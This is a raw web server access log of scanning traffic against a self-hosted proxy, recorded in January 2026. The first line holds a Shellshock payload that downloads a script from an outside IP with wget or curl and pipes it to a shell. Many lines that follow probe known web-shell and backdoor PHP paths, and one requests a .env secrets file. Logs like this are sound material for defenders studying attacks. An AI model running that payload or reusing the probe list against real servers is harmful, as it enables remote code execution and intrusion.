192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[17/Jan/2026:07:07:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/blue.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/fang.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/an7.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/f7.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/images/commentv.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "//function/function.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "//cgi-bin/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "//admin.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/fonts/index.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/images/wp-conflg.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/info.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/x/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/ss1.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "//assets/css/index.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "//goods.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "//admin.php?fm=true" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/blocks/code/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:15 +0000] 404 - GET http profibot.direct.quickconnect.to "//adminfuns.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/goat.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/PHPMailer/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/xx.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/js/wp-conflg.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/f5.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/doc.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/xtride.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower2.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:17 +0000] 404 - GET http profibot.direct.quickconnect.to "//f6.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:17 +0000] 404 - GET http profibot.direct.quickconnect.to "//edit.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:17 +0000] 404 - GET http profibot.direct.quickconnect.to "//aa.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/ext.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:17 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/js/dist/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/SimplePie/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "//av.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/Text/Diff/Engine/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/wsd.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/sadd5.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/deeto/login.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/classwithtostring.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/file48.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/blue/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/ot.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/css.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/alfa.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/inputs.php?" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/wen.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/x.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/xxxx.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/rest-api/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "//class.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:19 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/midnight/about.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/gec.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/f35.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/pp.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/update/f35.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:20 +0000] 404 - GET http profibot.direct.quickconnect.to "//lock360.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:20 +0000] 404 - GET http profibot.direct.quickconnect.to "//lv.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/lv.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/byp.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "//galex.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/as.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/pn.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/bipas.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/ha.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/shoyo.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-l0gin.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/ar.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/blurbs18.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/radio.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-good.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless14.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws13.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/gecko-litespeed.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/admin.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/setup-config.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/Contrller.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/ID3/about.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/admin.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/customize/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "//web.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/pwnd/as.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/zwso.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-trackback.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/autoload_classmap.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/xsec1.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/Requests/Text/admin.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/lx.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/fw.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/X7x.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/class20.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/lock360.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/themes.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass4.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/qqq.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/xvent.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-aaa.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/ut.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/class19.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/too.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/0o0.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/efile.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/mg.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/build.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/plss3.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/about3.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/atomlib.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/we.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "///admin.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/usep.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/nc4.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/cccc.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/locale.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/t.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/bp.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/user/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/geck.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/wpc.php?p=" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/yellow.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/a.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/thh.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/inde.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/gv.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/admins.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/.wp-db.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-configs.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/wp-configs.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/rest-api/fields/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/main.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/a1.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/ff2.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/dfre.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/class.1.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/lala.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/clawwww.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/tox.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/acacia.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/aa2.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:07:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/gg.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:07:08:06 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[17/Jan/2026:07:13:53 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 147.185.132.39] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[17/Jan/2026:07:18:26 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:07:20:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 20.106.196.4] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[17/Jan/2026:07:21:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:07:21:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:07:24:09 +0000] 404 - GET http 92.249.249.197 "/developmentserver/metadatauploader" [Client 20.150.194.49] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[17/Jan/2026:07:26:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.75] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:07:26:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.75] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:07:43:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:07:49:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:07:55:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:07:57:25 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.143.10.79] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:08:11:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:08:14:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:08:37:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:08:45:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.20.67] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:08:50:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:09:01:21 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.10 (X11; Linux i686; U; pl)" "-" 